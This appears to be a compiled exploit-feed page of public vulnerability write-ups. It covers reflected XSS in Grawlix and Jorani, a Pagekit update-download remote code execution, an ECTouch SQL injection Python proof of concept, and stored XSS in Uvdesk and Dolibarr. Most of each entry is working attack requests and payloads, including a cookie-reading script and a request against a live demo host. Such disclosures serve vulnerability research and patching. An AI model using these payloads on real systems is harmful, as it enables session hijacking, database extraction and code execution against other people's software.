    ## Title: grawlix-1.5.1 XSS-Reflected## Author: nu11secur1ty## Date: 08/29/2023## Vendor: https://getgrawlix.com/## Software:## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the ref request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload vy7tu"><script>alert(1)</script>e284ovbptuv was submittedin the ref parameter. This input was echoed unmodified in theapplication's response. The attacker can steal PHPSESSID cookie andcan trick the victim into visiting his or some other dangerous URLaddress.STATUS: HIGH-Vulnerability[+]Exploit:```POSTGET /grawlix-1.5.1/grawlix-cms-1.5.1/_admin/panl.login.php?grlx_xss_token=&ref=book.view.phpvy7tu%22%3E%3Cscript%3Ealert(%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65)%3C%2fscript%3Ehttp://pornhub.com&username=UXBhcRhk&extra=y9R%21m8c%21W6&submit=LoginHTTP/1.1Host: localhostsec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=oq08tie8elf34amgmti9e8bel2Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/getgrawlix/getgrawlix-1.5.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/grawlix-cms-151-xss-reflected.html)## Time spend:00:27:00

Grawlix 1.5.1 Cross Site Scripting

An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php

**Problem**

**There is a logical flaw that leads to obtaining shell access.**

**Technical Details**

*   Pagekit version: 1.0.18
*   Webserver: nginx
*   Database: mysql
*   PHP Version: 7.4

Vulnerability Path:  
app/installer/src/Controller/UpdateController.php  
Lines 32-72: downloadAction and updateAction functions  
The downloadAction function retrieves a file from a remote location to the local system.  
The updateAction function reads the downloaded file.  
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.  
It includes the app/installer/requirements.php file from the remotely fetched file.  
This can lead to remote code execution.  
Based on this, constructing a zip file as follows:  
pagekit.zip

The data package is as follows

    POST /index.php/admin/system/update/download HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost/index.php/admin/system/update/download
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
    

    POST /index.php/admin/system/update/update HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost /index.php/admin/system/update/update
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    _csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

CVE-2023-41005: There is a logical flaw that leads to obtaining shell access. · Issue #977 · pagekit/pagekit

ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.

#SQL Injection Vulnerability in ECTouch v2

###Vulnerability Position

In the insert\_bought\_notes function on line 285 in the \\ectouch-main\\include\\apps\\default\\helpers\\insert.php file, the incoming $arr\['id'\] parameter is not verified, resulting in a sql injection vulnerability.

###POC

Use python to write scripts for vulnerability verification.

#!/usr/bin/python
\# -\*- coding: utf-8 -\*-
\# @Author : qyg
\# @File : sqli check for ECTouch v2
\# @function : Detect for SQL injection vulnerabilities in ECTouch.

import requests,re

#your target
target \= 'http://127.0.0.1/'

payload \= '/index.php?m=default&c=user&a=register&u=0'

url \= target + payload

headers \= {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54',
    'Referer': '554fcae493e564ee0dc75bdf2ebf94cabought\_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}'
}

response \= requests.get(url, headers\=headers)

print(response.text)

match \= re.search('XPATH syntax error: \\'~(.\*)~\\'',response.text)

if match:
    print("There is SQL injection vulnerability, and you are currently using the following database:" + match.group(1))

Running results:

CVE-2023-39560: GitHub - Luci4n555/cve_ectouch: detail

Jorani version 1.0.3 suffers from a cross site scripting vulnerability.

    ## Title: Jorani-v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure## Author: nu11secur1ty## Date: 08/27/2023## Vendor: https://jorani.org/## Software: https://demo.jorani.org/session/login## Reference: https://portswigger.net/web-security/cross-site-scripting## Reference: https://portswigger.net/web-security/information-disclosure## Description:The value of the `language request` parameter is copied into aJavaScript string which is encapsulated in double quotation marks. Thepayload 75943";alert(1)//569 was submitted in the language parameter.This input was echoed unmodified in the application's response.The attacker can modify the token session and he can discoversensitive information for the server.STATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /session/login HTTP/1.1Host: demo.jorani.orgAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACKOrigin: http://demo.jorani.orgUpgrade-Insecure-Requests: 1Referer: http://demo.jorani.org/session/loginContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 183csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=```[+]Response:```HTTPHTTP/1.1 200 OKdate: Sun, 27 Aug 2023 06:03:04 GMTcontent-type: text/html; charset=UTF-8Content-Length: 681server: Apachex-powered-by: PHP/8.2expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;SameSite=Strictset-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;SameSite=Laxlast-modified: Sun, 27 Aug 2023 06:03:04 GMTvary: Accept-Encodingcache-control: private, no-cache, no-store, proxy-revalidate,no-transform, must-revalidatepragma: no-cachex-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1x-iplb-instance: 27474connection: close<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: 8192</p><p>Message:  strlen(): Passing null to parameter #1 ($string) of typestring is deprecated</p><p>Filename: controllers/Connection.php</p><p>Line Number: 126</p></div><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: Warning</p><p>Message:  Cannot modify header information - headers already sentby (output started at/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p><p>Filename: helpers/url_helper.php</p><p>Line Number: 565</p></div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)## Time spend:01:35:00

Jorani 1.0.3 Cross Site Scripting

Uvdesk version 1.1.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)# Date: 14/08/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://www.uvdesk.com/# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 1.1.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.## Example XSS Stored in new ticket-----------------------------------------------------------------------------------------------------------------------Param: reply-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1Host: 127.0.0.1Content-Length: 812Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3Connection: close------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="threadType"forward------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="status"------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="subject"aaaa------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="to[]"test@local.host------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="reply"%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="pic"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="nextView"stay------WebKitFormBoundaryXCjJcGbgZxZWLsSk-------------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Mon, 14 Aug 2023 11:33:26 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateLocation: /uvdesk/public/en/member/ticket/view/1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: bf1b73X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:33:26 GMTSet-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=laxConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 398<!DOCTYPE html><html>    <head>        <meta charset="UTF-8" />        <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />        <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>    </head>    <body>        Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.    </body></html>-----------------------------------------------------------------------------------------------------------------------Redirect and view response:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Mon, 14 Aug 2023 11:44:14 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: 254ce8X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:44:14 GMTConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 300607<!DOCTYPE html><html>    <head>        <title>#1 vvvvvvvvvvvvvvvvvvvvv</title>[...]<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>[...]-----------------------------------------------------------------------------------------------------------------------XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.

Uvdesk 1.1.4 Cross Site Scripting

Dolibarr version 17.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Dolibarr Version 17.0.1 - Stored XSS# Dork: # Date: 2023-08-09# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php# Version: 17.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : -----------------------------------------------------------------------------RequestsPOST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1Host: 127.0.0.1Content-Length: 599Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2ehtConnection: closetoken=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir

Tag

#webkit